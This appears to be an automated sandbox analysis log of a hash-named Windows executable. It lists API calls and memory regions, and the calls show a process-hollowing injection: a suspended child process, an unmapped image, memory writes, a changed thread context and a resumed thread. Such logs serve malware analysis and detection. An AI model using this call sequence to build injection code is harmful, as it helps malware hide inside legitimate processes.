CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0xf64, dwThreadId=0xf68)) returned 1 [0095.380] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.381] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0095.381] GetThreadContext (in: hThread=0x74, lpContext=0x210000 | out: lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x498440, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0095.382] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0095.382] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0095.489] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0095.495] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3d915a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3d915a0*, NumberOfBytesWritten=0x0) returned 0x0 [0095.514] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3d919a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3d919a0*, NumberOfBytesWritten=0x0) returned 0x0 [0095.548] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3e5bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3e5bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0095.572] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3e99ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3e99ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0095.601] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3e9ffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3e9ffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0095.620] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3ea01a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3ea01a0*, NumberOfBytesWritten=0x0) returned 0x0 [0095.640] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3d916ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3d916ec*, lpNumberOfBytesWritten=0x0) returned 1 [0095.640] SetThreadContext (hThread=0x74, lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0095.640] ResumeThread (hThread=0x74) returned 0x1 [0095.719] CloseHandle (hObject=0x74) returned 1 [0095.719] CloseHandle (hObject=0x78) returned 1 [0095.719] ExitProcess (uExitCode=0x0) [0095.720] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2507d0 | out: hHeap=0x250000) returned 1 Process: id = "6" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0x43b26000" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xf58" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 994 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 995 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 996 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 997 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 998 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 999 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1000 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 1001 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1002 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1003 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1004 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1005 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1006 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1007 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1008 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1009 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1011 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1012 start_va = 0x1a0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1013 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1014 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 